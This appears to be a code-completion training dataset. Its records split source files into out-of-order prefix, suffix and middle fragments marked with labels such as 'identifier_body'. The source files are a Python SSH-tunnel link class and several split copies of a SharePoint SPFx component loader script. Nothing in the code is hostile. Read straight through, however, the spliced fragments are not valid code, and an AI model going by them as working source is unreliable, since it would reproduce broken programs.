'Tunnel setup failed for '
'%s:%s' % (node1, node1.dest) + ' to '
'%s:%s\n' % (node2, node2.dest) +
'command was: %s' % cmd + '\n' +
'result was: ' + ch)
# 3. Move interfaces if necessary
for node in node1, node2:
if not self.moveIntf('tap9', node):
raise Exception('interface move failed on node %s' % node)
# 4. Rename tap interfaces to desired names
for node, intf, addr in ((node1, intfname1, addr1),
(node2, intfname2, addr2)):
if not addr:
result = node.cmd('ip link set tap9 name', intf)
else:
result = node.cmd('ip link set tap9 name', intf,
'address', addr)
if result:
raise Exception('error renaming %s: %s' % (intf, result))
return tunnel
def status(self):
"Detailed representation of link"
if self.tunnel:
if self.tunnel.poll() is not None:
status = "Tunnel EXITED %s" % self.tunnel.returncode
else:
status = "Tunnel Running (%s: %s)" % (
self.tunnel.pid, self.cmd)
else:
status = "OK"
result = "%s %s" % (Link.status(self), status)
return result
class RemoteSSHLink(RemoteLink):
"Remote link using SSH tunnels"
def __init__(self, node1, node2, **kwargs):
RemoteLink.__init__(self, node1, node2, **kwargs)
| "Override: disable -tt"
return super(RemoteMixin, self).popen(*args, tt=False, **kwargs) | identifier_body |
SPComponentLoader.js | import { _QosMonitor } from '@ms/sp-telemetry';
import { DebugManager } from '../../debug/DebugManager';
import ComponentStore from '../../stores/ComponentStore';
import ManifestStore from '../../stores/ManifestStore';
import { react16Version, reactComponentId, reactDomComponentId } from '../../utilities/componentConstants';
import { loadComponentQosScenarioName } from '../../utilities/telemetryConstants';
import { isDangerouslyEnableDebugKSActivated, isSkipFirstPartyLoaderLogKillswtichActivated, isDisable3PCodeKillswitchActivated, isOptimsticPreloadFilteredToViewPortKillswitchActivated } from '../common/killSwitches'; | * SPFx component loader.
*
* @public
*/
var SPComponentLoader = /** @class */ (function () {
function SPComponentLoader(loaderArgs) {
var bundledComponents = loaderArgs.bundledComponents, ctor = loaderArgs.ctor, _a = loaderArgs.debugData, debugLoader = _a.debugLoader, debugManifests = _a.debugManifests, registerAsNonDebug = _a.registerAsNonDebug, preloadedData = loaderArgs.preloadedData, serviceScope = loaderArgs.serviceScope, useSecondaryCdn = loaderArgs.useSecondaryCdn;
this._serviceScope = serviceScope;
if (useSecondaryCdn) {
// _TraceLogger.logError
}
// Let's see if we should stop here. In order to facilitate easier diagnosis of
// customer issues - and in particular custom code messing with common
// functionality, we make it possible to disable all 3rd party code by using
// the query string ?disable3PCode
if (!isDisable3PCodeKillswitchActivated()) {
var urlParams = new URLSearchParams(window.location.search);
this._skipThirdPartyCode = urlParams.has('disable3PCode');
}
else {
this._skipThirdPartyCode = false;
}
this._loader = new ctor(this._serviceScope, useSecondaryCdn);
SPComponentLoader._headElement = document === null || document === void 0 ? void 0 : document.getElementsByTagName('head')[0];
ManifestStore.instance.registerPreloadedManifests(preloadedData);
if (debugManifests) {
if (!registerAsNonDebug && !isDangerouslyEnableDebugKSActivated()) {
ManifestStore.instance.registerDebugManifests(debugManifests);
}
else {
ManifestStore.instance.registerManifests(debugManifests, registerAsNonDebug);
}
}
var monitor = new _QosMonitor('SPComponentLoader.pinnedManifests');
var pinnedManifests = [];
// Pin and store bundled components in the assembly
for (var _i = 0, _b = Object.keys(bundledComponents); _i < _b.length; _i++) {
var id = _b[_i];
var version = id === reactComponentId || id === reactDomComponentId ? react16Version : undefined;
var shouldPin = !debugLoader && !version;
// Only pin with the production loader to allow debug manifests to be loaded
// We don't pin react or react-dom since components can bring in different versions
if (shouldPin) {
ManifestStore.instance._pinManifest(id);
}
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
var component = bundledComponents[id];
var cid = normalizeComponentId(manifest.id, manifest.version);
if (shouldPin) {
pinnedManifests.push(cid);
}
this._loader.ensure(cid, component);
ComponentStore.instance.storeLoadedComponent(manifest.id, manifest.version, component);
}
}
monitor.writeSuccess({ pinnedManifests: pinnedManifests });
}
/**
* {@inheritDoc ISPComponentLoader.loadComponent}
*/
SPComponentLoader.prototype.loadComponent = function (manifest) {
var monitor;
var extraData;
if (!manifest.isInternal && this._skipThirdPartyCode) {
// Return an indefinitely pending promise to avoid loading the code and error handling
return new Promise(function () { }); // tslint:disable-line:no-empty
}
if (isSkipFirstPartyLoaderLogKillswtichActivated() || !manifest.isInternal) {
monitor = new _QosMonitor(loadComponentQosScenarioName);
extraData = {
alias: manifest.alias,
isDebug: manifest._isDebug,
isInternal: manifest.isInternal,
manifestId: manifest.id,
version: manifest.version
};
}
return this._loader
.loadComponent(manifest)
.then(function (c) {
if (monitor) {
monitor.writeSuccess(extraData);
}
return c;
})
.catch(function (e) {
if (monitor) {
monitor.writeUnexpectedFailure(undefined, undefined, e);
}
throw e.systemjsError || e.requirejsError || e;
});
};
/**
* {@inheritDoc ISPComponentLoader.loadComponentById}
*
* @public
*/
SPComponentLoader.prototype.loadComponentById = function (id, version) {
var _this = this;
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
return this.loadComponent(manifest);
}
else {
return ManifestStore.instance.requestManifest(id, version).then(function (m) { return _this.loadComponent(m); });
}
};
/**
* {@inheritDoc ISPComponentLoader.loadCss}
*/
SPComponentLoader.prototype.loadCss = function (url) {
var link = document.createElement('link');
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = url;
SPComponentLoader._headElement.appendChild(link);
};
/**
* {@inheritDoc ISPComponentLoader.loadScript}
*/
SPComponentLoader.prototype.loadScript = function (url, options) {
var monitor = new _QosMonitor('TinySPComponentLoader.loadScript');
return this._loader
.loadScript(url, options)
.then(function (m) {
monitor.writeSuccess();
return m;
})
.catch(function (e) {
monitor.writeUnexpectedFailure(undefined, e);
throw e;
});
};
/**
* {@inheritdoc ISPComponentLoader._loadDebugManifestsForWorkbench}
*
* @internal
*/
SPComponentLoader.prototype._loadDebugManifestsForWorkbench = function (manifestsFileUrl) {
return DebugManager.loadAndRegisterManifestsFile(this, manifestsFileUrl, true);
};
/**
* {@inheritdoc ISPComponentLoader._startApplication}
*
* @internal
*/
SPComponentLoader.prototype._startApplication = function (preloadedData) {
return startApplication(preloadedData, this._serviceScope).then(function (app) {
/*
* Normally non-SPFx environments locate their SPFx host application via a window variable
* that our startup code assigns like this:
*
* global.moduleLoaderPromise = global.spModuleLoader.start(spClientSidePageContext, handleFailure)
*
* However, in the case of the modern ListView, the "listview-spfx-host" loads after the main scripts,
* which creates a race condition where window.moduleLoaderPromise sometimes might not be assigned yet
* when their code tries to read it. In that situation, they can register a callback like this:
*
* if (window['moduleLoaderPromise']) {
* window['moduleLoaderPromise'].then((application) => {
* doSomething(application);
* });
* } else {
* window['_spLoaderCallback'] = function(application) {
* doSomething(application);
* };
* }
*/
/* tslint:disable:no-string-literal */
if (window['_spLoaderCallback']) {
var _spLoaderCallback = window['_spLoaderCallback']; // tslint:disable-line:no-any
_spLoaderCallback(app);
}
/* tslint:enable:no-string-literal */
return app;
});
};
/**
* {@inheritdoc ISPComponentLoader._preloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._preloadComponents = function () {
var _this = this;
if (!isOptimsticPreloadFilteredToViewPortKillswitchActivated() && document && document.head) {
var attributeName = 'data-sp-componentId';
var preloadElements = document.head.querySelectorAll("link[rel=preload][" + attributeName + "],script[" + attributeName + "]");
var preloadedIdSet = new Set();
for (var i = 0; i < preloadElements.length; i++) {
var componentId = preloadElements[i].getAttribute(attributeName);
if (componentId && !preloadedIdSet.has(componentId)) {
preloadedIdSet.add(componentId);
}
}
preloadedIdSet.forEach(function (id) {
var manifest = _this.tryGetManifestById(id);
if (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
}
});
}
else {
ManifestStore.instance.getRegisteredManifests(true).forEach(function (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
});
}
};
/**
* {@inheritdoc ISPComponentLoader._unloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._unloadComponents = function () {
for (var _i = 0, _a = ManifestStore.instance.getRegisteredManifests(); _i < _a.length; _i++) {
var m = _a[_i];
ComponentStore.instance.deleteComponent(m.id, m.version);
this._loader.delete(m);
}
};
// #region Candidates for deletion
SPComponentLoader.prototype.registerManifests = function (manifests) {
ManifestStore.instance.registerManifests(manifests, false);
};
SPComponentLoader.prototype.requestManifest = function (id, version) {
return ManifestStore.instance.requestManifest(id, version);
};
SPComponentLoader.prototype.tryGetLoadedComponent = function (manifest) {
return ComponentStore.instance.tryGetComponentReference(manifest.id, manifest.version);
};
SPComponentLoader.prototype.tryGetManifestById = function (id, version) {
return ManifestStore.instance.tryGetManifest(id, version);
};
Object.defineProperty(SPComponentLoader.prototype, "_manifestReferences", {
get: function () {
return ManifestStore.instance.getRegisteredManifests();
},
enumerable: false,
configurable: true
});
SPComponentLoader.prototype._initialize = function (preloadedData, bundledComponents, debugData) {
/* no-op*/
};
return SPComponentLoader;
}());
export { SPComponentLoader };
//# sourceMappingURL=SPComponentLoader.js.map | import { normalizeComponentId } from '../common/normalize';
import { startApplication } from '../common/platformLoader';
/** | random_line_split |
SPComponentLoader.js | import { _QosMonitor } from '@ms/sp-telemetry';
import { DebugManager } from '../../debug/DebugManager';
import ComponentStore from '../../stores/ComponentStore';
import ManifestStore from '../../stores/ManifestStore';
import { react16Version, reactComponentId, reactDomComponentId } from '../../utilities/componentConstants';
import { loadComponentQosScenarioName } from '../../utilities/telemetryConstants';
import { isDangerouslyEnableDebugKSActivated, isSkipFirstPartyLoaderLogKillswtichActivated, isDisable3PCodeKillswitchActivated, isOptimsticPreloadFilteredToViewPortKillswitchActivated } from '../common/killSwitches';
import { normalizeComponentId } from '../common/normalize';
import { startApplication } from '../common/platformLoader';
/**
* SPFx component loader.
*
* @public
*/
var SPComponentLoader = /** @class */ (function () {
function SPComponentLoader(loaderArgs) {
var bundledComponents = loaderArgs.bundledComponents, ctor = loaderArgs.ctor, _a = loaderArgs.debugData, debugLoader = _a.debugLoader, debugManifests = _a.debugManifests, registerAsNonDebug = _a.registerAsNonDebug, preloadedData = loaderArgs.preloadedData, serviceScope = loaderArgs.serviceScope, useSecondaryCdn = loaderArgs.useSecondaryCdn;
this._serviceScope = serviceScope;
if (useSecondaryCdn) {
// _TraceLogger.logError
}
// Let's see if we should stop here. In order to facilitate easier diagnosis of
// customer issues - and in particular custom code messing with common
// functionality, we make it possible to disable all 3rd party code by using
// the query string ?disable3PCode
if (!isDisable3PCodeKillswitchActivated()) {
var urlParams = new URLSearchParams(window.location.search);
this._skipThirdPartyCode = urlParams.has('disable3PCode');
}
else {
this._skipThirdPartyCode = false;
}
this._loader = new ctor(this._serviceScope, useSecondaryCdn);
SPComponentLoader._headElement = document === null || document === void 0 ? void 0 : document.getElementsByTagName('head')[0];
ManifestStore.instance.registerPreloadedManifests(preloadedData);
if (debugManifests) {
if (!registerAsNonDebug && !isDangerouslyEnableDebugKSActivated()) {
ManifestStore.instance.registerDebugManifests(debugManifests);
}
else {
ManifestStore.instance.registerManifests(debugManifests, registerAsNonDebug);
}
}
var monitor = new _QosMonitor('SPComponentLoader.pinnedManifests');
var pinnedManifests = [];
// Pin and store bundled components in the assembly
for (var _i = 0, _b = Object.keys(bundledComponents); _i < _b.length; _i++) {
var id = _b[_i];
var version = id === reactComponentId || id === reactDomComponentId ? react16Version : undefined;
var shouldPin = !debugLoader && !version;
// Only pin with the production loader to allow debug manifests to be loaded
// We don't pin react or react-dom since components can bring in different versions
if (shouldPin) {
ManifestStore.instance._pinManifest(id);
}
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
var component = bundledComponents[id];
var cid = normalizeComponentId(manifest.id, manifest.version);
if (shouldPin) {
pinnedManifests.push(cid);
}
this._loader.ensure(cid, component);
ComponentStore.instance.storeLoadedComponent(manifest.id, manifest.version, component);
}
}
monitor.writeSuccess({ pinnedManifests: pinnedManifests });
}
/**
* {@inheritDoc ISPComponentLoader.loadComponent}
*/
SPComponentLoader.prototype.loadComponent = function (manifest) {
var monitor;
var extraData;
if (!manifest.isInternal && this._skipThirdPartyCode) {
// Return an indefinitely pending promise to avoid loading the code and error handling
return new Promise(function () { }); // tslint:disable-line:no-empty
}
if (isSkipFirstPartyLoaderLogKillswtichActivated() || !manifest.isInternal) {
monitor = new _QosMonitor(loadComponentQosScenarioName);
extraData = {
alias: manifest.alias,
isDebug: manifest._isDebug,
isInternal: manifest.isInternal,
manifestId: manifest.id,
version: manifest.version
};
}
return this._loader
.loadComponent(manifest)
.then(function (c) {
if (monitor) {
monitor.writeSuccess(extraData);
}
return c;
})
.catch(function (e) {
if (monitor) {
monitor.writeUnexpectedFailure(undefined, undefined, e);
}
throw e.systemjsError || e.requirejsError || e;
});
};
/**
* {@inheritDoc ISPComponentLoader.loadComponentById}
*
* @public
*/
SPComponentLoader.prototype.loadComponentById = function (id, version) {
var _this = this;
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
return this.loadComponent(manifest);
}
else {
return ManifestStore.instance.requestManifest(id, version).then(function (m) { return _this.loadComponent(m); });
}
};
/**
* {@inheritDoc ISPComponentLoader.loadCss}
*/
SPComponentLoader.prototype.loadCss = function (url) {
var link = document.createElement('link');
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = url;
SPComponentLoader._headElement.appendChild(link);
};
/**
* {@inheritDoc ISPComponentLoader.loadScript}
*/
SPComponentLoader.prototype.loadScript = function (url, options) {
var monitor = new _QosMonitor('TinySPComponentLoader.loadScript');
return this._loader
.loadScript(url, options)
.then(function (m) {
monitor.writeSuccess();
return m;
})
.catch(function (e) {
monitor.writeUnexpectedFailure(undefined, e);
throw e;
});
};
/**
* {@inheritdoc ISPComponentLoader._loadDebugManifestsForWorkbench}
*
* @internal
*/
SPComponentLoader.prototype._loadDebugManifestsForWorkbench = function (manifestsFileUrl) {
return DebugManager.loadAndRegisterManifestsFile(this, manifestsFileUrl, true);
};
/**
* {@inheritdoc ISPComponentLoader._startApplication}
*
* @internal
*/
SPComponentLoader.prototype._startApplication = function (preloadedData) {
return startApplication(preloadedData, this._serviceScope).then(function (app) {
/*
* Normally non-SPFx environments locate their SPFx host application via a window variable
* that our startup code assigns like this:
*
* global.moduleLoaderPromise = global.spModuleLoader.start(spClientSidePageContext, handleFailure)
*
* However, in the case of the modern ListView, the "listview-spfx-host" loads after the main scripts,
* which creates a race condition where window.moduleLoaderPromise sometimes might not be assigned yet
* when their code tries to read it. In that situation, they can register a callback like this:
*
* if (window['moduleLoaderPromise']) {
* window['moduleLoaderPromise'].then((application) => {
* doSomething(application);
* });
* } else {
* window['_spLoaderCallback'] = function(application) {
* doSomething(application);
* };
* }
*/
/* tslint:disable:no-string-literal */
if (window['_spLoaderCallback']) {
var _spLoaderCallback = window['_spLoaderCallback']; // tslint:disable-line:no-any
_spLoaderCallback(app);
}
/* tslint:enable:no-string-literal */
return app;
});
};
/**
* {@inheritdoc ISPComponentLoader._preloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._preloadComponents = function () {
var _this = this;
if (!isOptimsticPreloadFilteredToViewPortKillswitchActivated() && document && document.head) {
var attributeName = 'data-sp-componentId';
var preloadElements = document.head.querySelectorAll("link[rel=preload][" + attributeName + "],script[" + attributeName + "]");
var preloadedIdSet = new Set();
for (var i = 0; i < preloadElements.length; i++) {
var componentId = preloadElements[i].getAttribute(attributeName);
if (componentId && !preloadedIdSet.has(componentId)) {
preloadedIdSet.add(componentId);
}
}
preloadedIdSet.forEach(function (id) {
var manifest = _this.tryGetManifestById(id);
if (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
}
});
}
else |
};
/**
* {@inheritdoc ISPComponentLoader._unloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._unloadComponents = function () {
for (var _i = 0, _a = ManifestStore.instance.getRegisteredManifests(); _i < _a.length; _i++) {
var m = _a[_i];
ComponentStore.instance.deleteComponent(m.id, m.version);
this._loader.delete(m);
}
};
// #region Candidates for deletion
SPComponentLoader.prototype.registerManifests = function (manifests) {
ManifestStore.instance.registerManifests(manifests, false);
};
SPComponentLoader.prototype.requestManifest = function (id, version) {
return ManifestStore.instance.requestManifest(id, version);
};
SPComponentLoader.prototype.tryGetLoadedComponent = function (manifest) {
return ComponentStore.instance.tryGetComponentReference(manifest.id, manifest.version);
};
SPComponentLoader.prototype.tryGetManifestById = function (id, version) {
return ManifestStore.instance.tryGetManifest(id, version);
};
Object.defineProperty(SPComponentLoader.prototype, "_manifestReferences", {
get: function () {
return ManifestStore.instance.getRegisteredManifests();
},
enumerable: false,
configurable: true
});
SPComponentLoader.prototype._initialize = function (preloadedData, bundledComponents, debugData) {
/* no-op*/
};
return SPComponentLoader;
}());
export { SPComponentLoader };
//# sourceMappingURL=SPComponentLoader.js.map | {
ManifestStore.instance.getRegisteredManifests(true).forEach(function (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
});
} | conditional_block |
SPComponentLoader.js | import { _QosMonitor } from '@ms/sp-telemetry';
import { DebugManager } from '../../debug/DebugManager';
import ComponentStore from '../../stores/ComponentStore';
import ManifestStore from '../../stores/ManifestStore';
import { react16Version, reactComponentId, reactDomComponentId } from '../../utilities/componentConstants';
import { loadComponentQosScenarioName } from '../../utilities/telemetryConstants';
import { isDangerouslyEnableDebugKSActivated, isSkipFirstPartyLoaderLogKillswtichActivated, isDisable3PCodeKillswitchActivated, isOptimsticPreloadFilteredToViewPortKillswitchActivated } from '../common/killSwitches';
import { normalizeComponentId } from '../common/normalize';
import { startApplication } from '../common/platformLoader';
/**
* SPFx component loader.
*
* @public
*/
var SPComponentLoader = /** @class */ (function () {
function SPComponentLoader(loaderArgs) |
/**
* {@inheritDoc ISPComponentLoader.loadComponent}
*/
SPComponentLoader.prototype.loadComponent = function (manifest) {
var monitor;
var extraData;
if (!manifest.isInternal && this._skipThirdPartyCode) {
// Return an indefinitely pending promise to avoid loading the code and error handling
return new Promise(function () { }); // tslint:disable-line:no-empty
}
if (isSkipFirstPartyLoaderLogKillswtichActivated() || !manifest.isInternal) {
monitor = new _QosMonitor(loadComponentQosScenarioName);
extraData = {
alias: manifest.alias,
isDebug: manifest._isDebug,
isInternal: manifest.isInternal,
manifestId: manifest.id,
version: manifest.version
};
}
return this._loader
.loadComponent(manifest)
.then(function (c) {
if (monitor) {
monitor.writeSuccess(extraData);
}
return c;
})
.catch(function (e) {
if (monitor) {
monitor.writeUnexpectedFailure(undefined, undefined, e);
}
throw e.systemjsError || e.requirejsError || e;
});
};
/**
* {@inheritDoc ISPComponentLoader.loadComponentById}
*
* @public
*/
SPComponentLoader.prototype.loadComponentById = function (id, version) {
var _this = this;
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
return this.loadComponent(manifest);
}
else {
return ManifestStore.instance.requestManifest(id, version).then(function (m) { return _this.loadComponent(m); });
}
};
/**
* {@inheritDoc ISPComponentLoader.loadCss}
*/
SPComponentLoader.prototype.loadCss = function (url) {
var link = document.createElement('link');
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = url;
SPComponentLoader._headElement.appendChild(link);
};
/**
* {@inheritDoc ISPComponentLoader.loadScript}
*/
SPComponentLoader.prototype.loadScript = function (url, options) {
var monitor = new _QosMonitor('TinySPComponentLoader.loadScript');
return this._loader
.loadScript(url, options)
.then(function (m) {
monitor.writeSuccess();
return m;
})
.catch(function (e) {
monitor.writeUnexpectedFailure(undefined, e);
throw e;
});
};
/**
* {@inheritdoc ISPComponentLoader._loadDebugManifestsForWorkbench}
*
* @internal
*/
SPComponentLoader.prototype._loadDebugManifestsForWorkbench = function (manifestsFileUrl) {
return DebugManager.loadAndRegisterManifestsFile(this, manifestsFileUrl, true);
};
/**
* {@inheritdoc ISPComponentLoader._startApplication}
*
* @internal
*/
SPComponentLoader.prototype._startApplication = function (preloadedData) {
return startApplication(preloadedData, this._serviceScope).then(function (app) {
/*
* Normally non-SPFx environments locate their SPFx host application via a window variable
* that our startup code assigns like this:
*
* global.moduleLoaderPromise = global.spModuleLoader.start(spClientSidePageContext, handleFailure)
*
* However, in the case of the modern ListView, the "listview-spfx-host" loads after the main scripts,
* which creates a race condition where window.moduleLoaderPromise sometimes might not be assigned yet
* when their code tries to read it. In that situation, they can register a callback like this:
*
* if (window['moduleLoaderPromise']) {
* window['moduleLoaderPromise'].then((application) => {
* doSomething(application);
* });
* } else {
* window['_spLoaderCallback'] = function(application) {
* doSomething(application);
* };
* }
*/
/* tslint:disable:no-string-literal */
if (window['_spLoaderCallback']) {
var _spLoaderCallback = window['_spLoaderCallback']; // tslint:disable-line:no-any
_spLoaderCallback(app);
}
/* tslint:enable:no-string-literal */
return app;
});
};
/**
* {@inheritdoc ISPComponentLoader._preloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._preloadComponents = function () {
var _this = this;
if (!isOptimsticPreloadFilteredToViewPortKillswitchActivated() && document && document.head) {
var attributeName = 'data-sp-componentId';
var preloadElements = document.head.querySelectorAll("link[rel=preload][" + attributeName + "],script[" + attributeName + "]");
var preloadedIdSet = new Set();
for (var i = 0; i < preloadElements.length; i++) {
var componentId = preloadElements[i].getAttribute(attributeName);
if (componentId && !preloadedIdSet.has(componentId)) {
preloadedIdSet.add(componentId);
}
}
preloadedIdSet.forEach(function (id) {
var manifest = _this.tryGetManifestById(id);
if (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
}
});
}
else {
ManifestStore.instance.getRegisteredManifests(true).forEach(function (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
});
}
};
/**
* {@inheritdoc ISPComponentLoader._unloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._unloadComponents = function () {
for (var _i = 0, _a = ManifestStore.instance.getRegisteredManifests(); _i < _a.length; _i++) {
var m = _a[_i];
ComponentStore.instance.deleteComponent(m.id, m.version);
this._loader.delete(m);
}
};
// #region Candidates for deletion
SPComponentLoader.prototype.registerManifests = function (manifests) {
ManifestStore.instance.registerManifests(manifests, false);
};
SPComponentLoader.prototype.requestManifest = function (id, version) {
return ManifestStore.instance.requestManifest(id, version);
};
SPComponentLoader.prototype.tryGetLoadedComponent = function (manifest) {
return ComponentStore.instance.tryGetComponentReference(manifest.id, manifest.version);
};
SPComponentLoader.prototype.tryGetManifestById = function (id, version) {
return ManifestStore.instance.tryGetManifest(id, version);
};
Object.defineProperty(SPComponentLoader.prototype, "_manifestReferences", {
get: function () {
return ManifestStore.instance.getRegisteredManifests();
},
enumerable: false,
configurable: true
});
SPComponentLoader.prototype._initialize = function (preloadedData, bundledComponents, debugData) {
/* no-op*/
};
return SPComponentLoader;
}());
export { SPComponentLoader };
//# sourceMappingURL=SPComponentLoader.js.map | {
var bundledComponents = loaderArgs.bundledComponents, ctor = loaderArgs.ctor, _a = loaderArgs.debugData, debugLoader = _a.debugLoader, debugManifests = _a.debugManifests, registerAsNonDebug = _a.registerAsNonDebug, preloadedData = loaderArgs.preloadedData, serviceScope = loaderArgs.serviceScope, useSecondaryCdn = loaderArgs.useSecondaryCdn;
this._serviceScope = serviceScope;
if (useSecondaryCdn) {
// _TraceLogger.logError
}
// Let's see if we should stop here. In order to facilitate easier diagnosis of
// customer issues - and in particular custom code messing with common
// functionality, we make it possible to disable all 3rd party code by using
// the query string ?disable3PCode
if (!isDisable3PCodeKillswitchActivated()) {
var urlParams = new URLSearchParams(window.location.search);
this._skipThirdPartyCode = urlParams.has('disable3PCode');
}
else {
this._skipThirdPartyCode = false;
}
this._loader = new ctor(this._serviceScope, useSecondaryCdn);
SPComponentLoader._headElement = document === null || document === void 0 ? void 0 : document.getElementsByTagName('head')[0];
ManifestStore.instance.registerPreloadedManifests(preloadedData);
if (debugManifests) {
if (!registerAsNonDebug && !isDangerouslyEnableDebugKSActivated()) {
ManifestStore.instance.registerDebugManifests(debugManifests);
}
else {
ManifestStore.instance.registerManifests(debugManifests, registerAsNonDebug);
}
}
var monitor = new _QosMonitor('SPComponentLoader.pinnedManifests');
var pinnedManifests = [];
// Pin and store bundled components in the assembly
for (var _i = 0, _b = Object.keys(bundledComponents); _i < _b.length; _i++) {
var id = _b[_i];
var version = id === reactComponentId || id === reactDomComponentId ? react16Version : undefined;
var shouldPin = !debugLoader && !version;
// Only pin with the production loader to allow debug manifests to be loaded
// We don't pin react or react-dom since components can bring in different versions
if (shouldPin) {
ManifestStore.instance._pinManifest(id);
}
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
var component = bundledComponents[id];
var cid = normalizeComponentId(manifest.id, manifest.version);
if (shouldPin) {
pinnedManifests.push(cid);
}
this._loader.ensure(cid, component);
ComponentStore.instance.storeLoadedComponent(manifest.id, manifest.version, component);
}
}
monitor.writeSuccess({ pinnedManifests: pinnedManifests });
} | identifier_body |
SPComponentLoader.js | import { _QosMonitor } from '@ms/sp-telemetry';
import { DebugManager } from '../../debug/DebugManager';
import ComponentStore from '../../stores/ComponentStore';
import ManifestStore from '../../stores/ManifestStore';
import { react16Version, reactComponentId, reactDomComponentId } from '../../utilities/componentConstants';
import { loadComponentQosScenarioName } from '../../utilities/telemetryConstants';
import { isDangerouslyEnableDebugKSActivated, isSkipFirstPartyLoaderLogKillswtichActivated, isDisable3PCodeKillswitchActivated, isOptimsticPreloadFilteredToViewPortKillswitchActivated } from '../common/killSwitches';
import { normalizeComponentId } from '../common/normalize';
import { startApplication } from '../common/platformLoader';
/**
* SPFx component loader.
*
* @public
*/
var SPComponentLoader = /** @class */ (function () {
function | (loaderArgs) {
var bundledComponents = loaderArgs.bundledComponents, ctor = loaderArgs.ctor, _a = loaderArgs.debugData, debugLoader = _a.debugLoader, debugManifests = _a.debugManifests, registerAsNonDebug = _a.registerAsNonDebug, preloadedData = loaderArgs.preloadedData, serviceScope = loaderArgs.serviceScope, useSecondaryCdn = loaderArgs.useSecondaryCdn;
this._serviceScope = serviceScope;
if (useSecondaryCdn) {
// _TraceLogger.logError
}
// Let's see if we should stop here. In order to facilitate easier diagnosis of
// customer issues - and in particular custom code messing with common
// functionality, we make it possible to disable all 3rd party code by using
// the query string ?disable3PCode
if (!isDisable3PCodeKillswitchActivated()) {
var urlParams = new URLSearchParams(window.location.search);
this._skipThirdPartyCode = urlParams.has('disable3PCode');
}
else {
this._skipThirdPartyCode = false;
}
this._loader = new ctor(this._serviceScope, useSecondaryCdn);
SPComponentLoader._headElement = document === null || document === void 0 ? void 0 : document.getElementsByTagName('head')[0];
ManifestStore.instance.registerPreloadedManifests(preloadedData);
if (debugManifests) {
if (!registerAsNonDebug && !isDangerouslyEnableDebugKSActivated()) {
ManifestStore.instance.registerDebugManifests(debugManifests);
}
else {
ManifestStore.instance.registerManifests(debugManifests, registerAsNonDebug);
}
}
var monitor = new _QosMonitor('SPComponentLoader.pinnedManifests');
var pinnedManifests = [];
// Pin and store bundled components in the assembly
for (var _i = 0, _b = Object.keys(bundledComponents); _i < _b.length; _i++) {
var id = _b[_i];
var version = id === reactComponentId || id === reactDomComponentId ? react16Version : undefined;
var shouldPin = !debugLoader && !version;
// Only pin with the production loader to allow debug manifests to be loaded
// We don't pin react or react-dom since components can bring in different versions
if (shouldPin) {
ManifestStore.instance._pinManifest(id);
}
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
var component = bundledComponents[id];
var cid = normalizeComponentId(manifest.id, manifest.version);
if (shouldPin) {
pinnedManifests.push(cid);
}
this._loader.ensure(cid, component);
ComponentStore.instance.storeLoadedComponent(manifest.id, manifest.version, component);
}
}
monitor.writeSuccess({ pinnedManifests: pinnedManifests });
}
/**
* {@inheritDoc ISPComponentLoader.loadComponent}
*/
SPComponentLoader.prototype.loadComponent = function (manifest) {
var monitor;
var extraData;
if (!manifest.isInternal && this._skipThirdPartyCode) {
// Return an indefinitely pending promise to avoid loading the code and error handling
return new Promise(function () { }); // tslint:disable-line:no-empty
}
if (isSkipFirstPartyLoaderLogKillswtichActivated() || !manifest.isInternal) {
monitor = new _QosMonitor(loadComponentQosScenarioName);
extraData = {
alias: manifest.alias,
isDebug: manifest._isDebug,
isInternal: manifest.isInternal,
manifestId: manifest.id,
version: manifest.version
};
}
return this._loader
.loadComponent(manifest)
.then(function (c) {
if (monitor) {
monitor.writeSuccess(extraData);
}
return c;
})
.catch(function (e) {
if (monitor) {
monitor.writeUnexpectedFailure(undefined, undefined, e);
}
throw e.systemjsError || e.requirejsError || e;
});
};
/**
* {@inheritDoc ISPComponentLoader.loadComponentById}
*
* @public
*/
SPComponentLoader.prototype.loadComponentById = function (id, version) {
var _this = this;
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
return this.loadComponent(manifest);
}
else {
return ManifestStore.instance.requestManifest(id, version).then(function (m) { return _this.loadComponent(m); });
}
};
/**
* {@inheritDoc ISPComponentLoader.loadCss}
*/
SPComponentLoader.prototype.loadCss = function (url) {
var link = document.createElement('link');
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = url;
SPComponentLoader._headElement.appendChild(link);
};
/**
* {@inheritDoc ISPComponentLoader.loadScript}
*/
SPComponentLoader.prototype.loadScript = function (url, options) {
var monitor = new _QosMonitor('TinySPComponentLoader.loadScript');
return this._loader
.loadScript(url, options)
.then(function (m) {
monitor.writeSuccess();
return m;
})
.catch(function (e) {
monitor.writeUnexpectedFailure(undefined, e);
throw e;
});
};
/**
* {@inheritdoc ISPComponentLoader._loadDebugManifestsForWorkbench}
*
* @internal
*/
